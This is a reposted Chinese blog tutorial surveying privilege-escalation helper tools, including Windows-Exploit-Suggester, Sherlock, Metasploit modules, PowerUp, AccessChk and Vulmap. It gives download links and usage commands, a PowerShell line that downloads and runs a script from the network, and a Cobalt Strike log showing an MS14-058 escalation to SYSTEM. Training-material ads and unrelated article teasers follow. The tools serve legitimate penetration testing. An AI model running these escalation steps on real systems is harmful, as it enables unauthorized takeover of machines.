干货_常用提权辅助工具推荐

干货 | 常用提权辅助工具推荐

一、使用Windows-Exploit-Suggester解析systeminfo

1、简介

Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具,用python开发而成,通过比对systeminfo生成的文件,从而发现系统是否存在未修复漏洞。

2、下载地址:

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

3、使用方式:

1.安装xlrd包(注意python2、3版本的pip问题)

使用python2 的pip来安装xlrd包 命令:

python2 -m pip install xlrd==1.2.0

安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:

最近xlrd更新到了2.0.1版本,只支持.xls文件。

所以pandas.read_excel(‘xxx.xlsx’)会报错。

2.获取对应的漏洞信息库(注意要使用python2来获取)

python2 windows-exploit-suggester.py --update

成功后会生成一个xls表格文件

3.生成要进行对比的靶机的系统信息

systeminfo > systeminfo_win10.txt

在对应的靶机上运行该命令把靶机安装不到情况写入systeminfo_win10.txt文件中

4.使用windows-exploit-suggester.py来进行对比

python2 windows-exploit-suggester.py --database 2023-03-07-mssb.xls --systeminfo systeminfo_win10.txt

二、使用Linux-Exploit-Suggester.sh寻找linux提权问题

1、简介

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具

2、下载地址:

https://github.com/mzet-/linux-exploit-suggester

3、使用方式:

./linux-exploit-suggester.sh

三、使用Sherlock工具

1、简介

Sherlock是一个在Windows下用于本地提权的PowerShell脚本。

目前包含了以下漏洞:

MS10-015 : User Mode to Ring (KiTrap0D) MS10-092 : Task Scheduler MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow MS13-081 : TrackPopupMenuEx Win32k NULL Page MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference MS15-051 : ClientCopyImage Win32k MS15-078 : Font Driver Buffer Overflow MS16-016 : ‘mrxdav.sys’ WebDAV MS16-032 : Secondary Logon Handle

2、下载地址:

https://github.com/rasta-mouse/Sherlock

3、使用方式:

1.加载脚本

本地加载脚本

Import-Module Sherlock.ps1

远程加载脚本

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

2.发现漏洞

Find-AllVulns

Appears Vulnerable就是存在漏洞

3.验证漏洞

elevate ms14-058 smb

4、使用实例:

beacon> getuid [*] Tasked beacon to get userid [+] host called home, sent: 20 bytes [*] You are Win7-x64\Rasta beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1 [*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1 [+] host called home, sent: 2960 bytes beacon> powershell Find-MS14058 [*] Tasked beacon to run: Find-MS14058 [+] host called home, sent: 20 bytes [+] received output: Title : TrackPopupMenu Win32k Null Pointer Dereference MSBulletin : MS14-058 CVEID : 2014-4113 Link : https://www.exploit-db.com/exploits/35101/ VulnStatus : Appears Vulnerable beacon> elevate ms14-058 smb [*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337) [+] host called home, sent: 105015 bytes [+] received output: [*] Getting Windows version... [*] Solving symbols... [*] Requesting Kernel loaded modules... [*] pZwQuerySystemInformation required length 51216 [*] Parsing SYSTEM_INFO... [*] 173 Kernel modules found [*] Checking module \SystemRoot\system32\ntoskrnl.exe [*] Good! nt found as ntoskrnl.exe at 0x0264f000 [*] ntoskrnl.exe loaded in userspace at: 40000000 [*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC [*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0 [*] Registering class... [*] Creating window... [*] Allocating null page... [*] Getting PtiCurrent... [*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0 [*] Creating a fake structure at NULL... [*] Triggering vulnerability... [!] Executing payload... [+] host called home, sent: 204885 bytes [+] established link to child beacon: 192.168.56.105 beacon> getuid [*] Tasked beacon to get userid [+] host called home, sent: 8 bytes [*] You are NT AUTHORITY\SYSTEM (admin)

四、使用MSF查询补丁和可利用提权漏洞

1、查询补丁

meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020 [+] KB976902 installed on 11/21/2010

2、查询Exp

msf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP> msf> set SESSION msf> run

3、利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION msf> run meterpreter> getuid Server username: NT AUTHORITY\SYSTEM

五、使用powerup检查提权漏洞

1、简介

PowerUp 所做的事是寻找可能存在弱点的地方,从而帮助提权。 利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1,再执行powershell Invoke-AllChecks命令,使用 PowerUp 脚本可以快速的帮助我们发现系统弱点,从而实现提权的目的。

2、下载地址

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

3、使用方式

执行以下命令:将 ps1 文件上传到目标主机,并执行所有弱点检查。

powershell-import PowerUp.ps1 powershell invoke-allchecks

4、注意

1、如果在自己的靶机上发现导入ps1文件失败,这可能是因为系统不允许执行不信任的脚本文件导致的。 这时为了复现成功可以来到靶机下,以管理员权限打开 Powershell,运行set-ExecutionPolicy RemoteSigned,输入Y回车,此时系统便能导入PowerUp.ps1文件了。 如果是真实环境执行不了那就只能换工具了。 2、在运行Invoke-AllChecks后,便会列出当前系统中可被提权的弱点之处,之后再执行检查结果中AbuseFunction下的命令便能开始提权操作了。

六、accesschk.exe

1、简介

AccessChk是微软提供的一款安全检查工具,是Sysintenals集合中的一款工具,使用它可以对Windows系统中的一些系统文件、服务、注册表等进行管理和维护排查等功能,可以很直观清晰的发现系统资源存在的缺陷,对其进行提权等,所以往往会被攻击者利用。

2、下载地址

英文版本:

http://technet.microsoft.com/en-us/sysinternals/bb664922

中文版本:

http://technet.microsoft.com/ZH-cn/sysinternals/bb664922

3、使用方式

1.AccessChk常用参数:

-c Name是服务名称,如spooler -d 仅处理目录,或最高级的 -k Name是注册表项 -n 仅显示没有访问权限的对象 -p Name是进程或进程PID,例如svchost.exe -r 仅显示具有读取访问权限的对象 -s 递归 -v 显示详细信息 -w 仅显示具有写入访问权限的对象

2.常用语句

查看所有用户在d盘dir路径的子路径的权限 accesschk "d:\dir" 查看Administrator用户在d盘dir路径的子路径的权限 accesschk "Administrator "d:\dir" 查看Administrators组对所有服务的权限 accesschk Administrators -c * 查看Guest用户对hklm\software注册表的权限 accesschk -k Guest hklm\software 查看User用户对全局对象的权限 accesschk -ou User

3.详细使用方式

https://learn.microsoft.com/zh-cn/sysinternals/downloads/accesschk

七、WindowsVulnScan

查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本

1、简介

WindowsVulnScan是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。 本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。

2、下载地址:

https://github.com/chroblert/WindowsVulnScan

3、使用方式

1.参数介绍

可选参数: -h, --help show this help message and exit -u, --update-cve 更新CVEKB数据 -U, --update-exp 更新CVEEXP数据 -m MODE, --mode MODE 搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更新之前未成功更新的 -C, --check-EXP 检索具有EXP的CVE -n PRODUCTNAME, --productName PRODUCTNAME 搭配-C使用。自定义产品名称,如Windows 10 -N PRODUCTVERSION, --productVersion PRODUCTVERSION 搭配-C使用。自定义产品版本,如20H2 -f FILE, --file FILE ps1脚本运行后产生的.json文件

2.使用方式

1. 首先运行powershell脚本KBCollect.ps收集一些信息 .\KBCollect.ps1 2. 将运行后产生的KB.json文件移动到cve-check.py所在的目录 3. 安装一些python3模块 python3 -m pip install requirements.txt 4. 运行cve-check.py -u创建CVEKB数据库 5. 运行cve-check.py -U更新CVEKB数据库中的hasPOC字段 cve-check.py -u 此处可以使用-m选择更新模式。 -m All:更新所有 -m Empty:只更新hasPOC字段为空的 -m Error:只更新hasPOC字段为Error的 6. 运行cve-check.py -C -f KB.json查看具有公开EXP的CVE,如下: cve-check.py -C -f KB.json 7. 若使用脚本扫描到的系统名称和版本不准确,可以使用-n,-N进行指定

八、gtfo

1、简介

特征。该工具的唯一功能是让您能够从终端中搜索gtfobins和lolbas。 GTFOBins:Linux命令提权辅助查询

https://gtfobins.github.io/

LOLBAS:Windows命令提权辅助查询

https://lolbas-project.github.io/

2、下载地址

https://github.com/mzfr/gtfo

3、使用方式

https://github.com/mzfr/gtfo

九、Vulmap

1、简介

Vulmap是一款漏洞扫描工具, 可对Web容器、Web服务器、Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能。 相关测试人员可以使用vulmap检测目标是否存在特定漏洞, 并且可以使用漏洞利用功能验证漏洞是否真实存在。

2、下载地址

https://github.com/vulmon/Vulmap

安装依赖:

pip3 install -r requirements.txt

3、使用方式

测试所有漏洞poc python3 vulmap.py -u http://testphp.vulnweb.com RCE漏洞使用id命令 python3 vulmap.py -u http://example.com -c "id" 指定web容器 -a参数 python3 vulmap.py -u http://example.com -a struts2 指定模式 -m参数 python3 vulmap.py -u http://example.com -m poc -a struts2 指定漏洞 -v参数 python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729 批量扫描URL -f参数 python3 vulmap.py -f scan_list.txt 导出扫描结果 -o参数 python3 vulmap.py -u http://example.com -o result.txt 详细使用可参考: https://blog.csdn.net/qq_45924653/article/details/109022892

十、BeRoot

1、简介

BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法。其二进制编译地址为:

https://github.com/AlessandroZ/BeRoot/releases

它将作为后开发模块被添加到pupy(Pupy是一个开源,跨平台(Windows,Linux,OSX,Android),多功能RAT远程管理工具和后开发工具,主要用python编写)项目中(因此它将在内存中执行,而不会在硬盘中执行)。 需要注意的是,这款工具只能用来检测,而无法直接利用目标系统中存在的漏洞。但是,如果它发现了错误配置,它可以通过模版来利用这些漏洞。模版文件位于templates/service目录下,如果项目提供的模版文件无法运行,我们也可以根据目标系统的情况手动创建一个模版文件。

2、下载地址

https://github.com/AlessandroZ/BeRoot

3、使用方式

https://www.cnblogs.com/backlion/p/7325144.html

十一、在线提权漏洞检测平台

极光无限出品的安全扫描仪,在提权方面,基于其强大的安全检测能力,能够给出专业的修复建议,有效验证和加固网络资产漏洞。 查询地址:

https://detect.secwx.com/

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。

读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)

一、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

二、部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

三、适合学习的人群

基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

文章来自网上,侵权请联系博主

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1124486.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

外卖大军:“一口热饭”的需求引发的一系列多线程社会问题与困局

在现代都市的日常图景中&#xff0c;一个再平常不过的动作——点开手机&#xff0c;为一份即将送达的“热饭”支付费用——已成为数亿人的习惯。这份对即时温饱的朴素追求&#xff0c;却如同投入平静湖面的一颗石子&#xff0c;激荡起一连串深远而复杂的涟漪&#xff0c;最终汇…

学服务器训练AI模型:5步路径助力高效入门

想用服务器训练AI模型不少AI开发者都会陷入“看会操作、动手就崩”的困境&#xff1a;记混服务器连接命令、环境配置反复报错、训练时显存不足无措——纯视频学习只给流程演示&#xff0c;缺逻辑拆解和实操反馈&#xff0c;很难真正落地。我们需要通过视频内容快速提炼视频核心…

人工电销和AI机器人功能的根本区别是什么

“拨号两小时&#xff0c;沟通五分钟”“空号拒接占一半&#xff0c;有效线索难寻觅”“高频外呼就封号&#xff0c;业务中断心发慌”…… 这些电销困境&#xff0c;是不是正困扰着你的团队&#xff1f; 传统外呼模式下&#xff0c;人工效率低、封号风险高、数据管理乱三大痛点…

是德科技N9020B安捷伦N9020A N9030A频谱分析仪

N9020B是Keysight&#xff08;是德科技&#xff09;生产的一款高性能MXA系列信号分析仪&#xff0c;专为无线通信和射频测试设计&#xff0c;支持10 Hz至50 GHz频率范围&#xff0c;最高160 MHz分析带宽。 产品概述 N9020B是Keysight&#xff08;原安捷伦&#xff09;推出的‌M…

HP8920A安捷伦8921A 8920B综合测试仪对讲机测试仪

HP惠普8920A可选的合成频谱分析仪可测量400kHz&#xff5e;1GHz的信号,可变间距为5kHz&#xff5e;1GHz(全间距).显示分辩力可在每格1、2或10dB&#xff08;分贝&#xff09;之间进行选择。可调光标自动读出频率和幅度或者相对于基准而言的相对幅度。频谱分析仪所包括的跟踪发生…

风靡TikTok,影响超800万辆汽车,原因竟是一根USB 线?

风靡TikTok&#xff0c;影响超800万辆汽车&#xff0c;原因竟是一根 USB 线&#xff1f; Bleeping Computer 网站披露&#xff0c;韩国汽车制造商现代&#xff08;Hyundai&#xff09;和起亚&#xff08;Kia&#xff09;给旗下约 830 万辆汽车进行了防盗安全更新&#xff08;预…

什么是Keychain

文章目录为什么需要keychainkeychain是由哪些部分组成keychain是如何工作的keychain的典型应用Keychain中的Key&#xff0c;不是算法&#xff0c;也不是密钥&#xff0c;而是一套加密和认证的规则。keychain通过对它拥有的一系列Key进行集中控制和灵活管理&#xff0c;为应用程…

Angular页面跳转03,Angular 路由导航:routerLink 指令与 Router 服务 navigate 方法全解析

在 Angular 应用开发中&#xff0c;路由导航是构建单页面应用&#xff08;SPA&#xff09;的核心能力。你在开发过程中一定会遇到两种主流的导航方式&#xff1a;模板中使用的routerLink指令&#xff0c;以及组件类中通过Router服务调用的navigate方法。本文将详细拆解这两种方…

是德科技33522B安捷伦33621A 33622A波形发生器

Keysight 33522B 是一款双通道波形发生器&#xff0c;采用Trueform 信号生成技术&#xff0c;旨在为电子测试和测量、通信系统验证及教育研究等领域提供高精度、低噪声的信号源。‌ 1 2 ‌核心特性与技术规格&#xff1a;‌ 该设备的核心优势在于 Trueform 技术&#xff0c;相比…

C/C++数据结构综合设计任务分配(29人7组)[2026-01-07]

C/C数据结构综合设计任务分配&#xff08;29人7组&#xff09;[2026-01-07] 一、整体任务概况 本次数据结构综合设计任务共分为7个小组&#xff0c;总计29人参与&#xff0c;每个小组负责不同的项目开发任务&#xff0c;每个项目包含多个功能模块&#xff0c;明确了各模块的问…

Angular页面跳转04,深入理解 Angular 路由参数:ActivatedRoute 中 paramMap 与 queryParamMap 的核心区别

在 Angular 开发中&#xff0c;路由参数传递是页面间数据通信的核心场景之一。而ActivatedRoute服务作为获取路由相关信息的核心入口&#xff0c;其提供的paramMap和queryParamMap两个属性常让开发者混淆 —— 它们看似都能获取参数&#xff0c;实则应用场景和使用方式截然不同…

Ai人声伴奏一键分离器!背景音乐提取器,纯本地运行,使用简单,音频分离工具 vocal-separate-v0.0.4

下载链接 https://tool.nineya.com/s/1jbucagia 软件介绍 这是一个极简的人声和背景音乐分离工具&#xff0c;本地化网页操作&#xff0c;无需连接外网&#xff0c;可以 将一首歌曲或者含有背景音乐的音视频文件&#xff0c;拖拽到本地网页中&#xff0c;即可将其中的人声和…

【程序员必看】AI Agent进化全解析:如何让“只会说话“的模型变成“能干活“的行动派

文章讲述了AI Agent从ChatGPT到能完成复杂任务的进化历程&#xff0c;分为五个关键阶段&#xff1a;从纯对话功能到函数调用、ReAct思考模式、RAG记忆系统&#xff0c;最后到多Agent协作。核心观点是&#xff0c;Agent并非AI本身的升级&#xff0c;而是人类将"如何工作&qu…

Siemens与NVIDIA扩大合作,共同打造工业人工智能运营系统

• Siemens与NVIDIA正借助人工智能技术&#xff0c;重塑覆盖设计、工程、制造、生产、运营直至供应链的端到端工业全价值链 • Siemens与NVIDIA将共同构建由人工智能加速的技术产品组合&#xff0c;涵盖人工智能原生电子设计、人工智能原生仿真以及人工智能驱动的自适应制造与供…

纺织厂的数字化转型是必要的吗,细看AI验布机对纺织厂的影响

如今时代已经过大幅变迁&#xff0c;科技愈发先进&#xff0c;致使各种AI型机器不断横空出世&#xff0c;AI验布机就是其中一个很好的例子&#xff0c;它很好用&#xff0c;但也不是所有工厂都适合立即引进。建议可以考虑的几种情况&#xff0c;帮助您科学判断是否需要进行智能…

手机屏幕翻译软件,可离线翻译,支持上百种语言翻译,学外语必备的翻译工具!免费使用~

​​​​​下载链接 https://tool.nineya.com/s/1jbu06k85 软件介绍 手机屏幕翻译软件&#xff0c;可离线翻译&#xff0c;支持上百种语言翻译&#xff0c;学外语必备的翻译工具&#xff01;免费使用~ 软件特点 无需复制文字&#xff0c;直接扫描屏幕进行翻译内置翻译源&am…

2026 开年观察:地缘变局与降息预期交织,比特币在 9 万美元上谨慎前行

撰文&#xff1a;Yangz&#xff0c;Techub News2026 年开年&#xff0c;加密货币市场以温和上涨开局。比特币在 1 月 5 日涨至 9.4 万美元上方&#xff0c;较去年末的 8.7 万美元上涨约 8%&#xff0c;虽然现已回落至 9.3 万美元附近&#xff0c;但整体而言&#xff0c;开年的上…

友达 G121EAN01.2 工业便携屏:12.1 英寸超宽温 AHVA 高色域高亮度显示驱动技术解析

前言If you have any questions, feel free to communicate at any timeRecord each screen with code【V】【Guste8868】在工业户外便携终端、高精度检测设备场景中&#xff0c;12.1 英寸 WXGA 模组需满足 **-30~85℃超宽温 **、1000 cd/m 超高亮度&#xff08;应对户外强光&a…

无法修补的漏洞:PS5_BootROM密钥遭泄露,索尼安全防线崩塌

无法修补的漏洞&#xff1a;PS5 BootROM密钥遭泄露&#xff0c;索尼安全防线崩塌 上周&#xff0c;一名身份不明的黑客泄露了索尼用于保护PlayStation 5游戏机信任链的关键安全密钥。这类被称为BootROM的安全密钥是索尼安全信任架构的核心组件。理论上&#xff0c;该密钥的曝光…

Angular页面跳转02,一文吃透 Angular 路由配置:静态路由、动态路由与通配符路由

路由是单页应用&#xff08;SPA&#xff09;的核心骨架&#xff0c;Angular 作为成熟的前端框架&#xff0c;提供了强大且灵活的路由系统。本文将从实际开发场景出发&#xff0c;详解 Angular 中最常用的三种路由配置方式&#xff1a;静态路由、动态路由&#xff08;带参数:id&…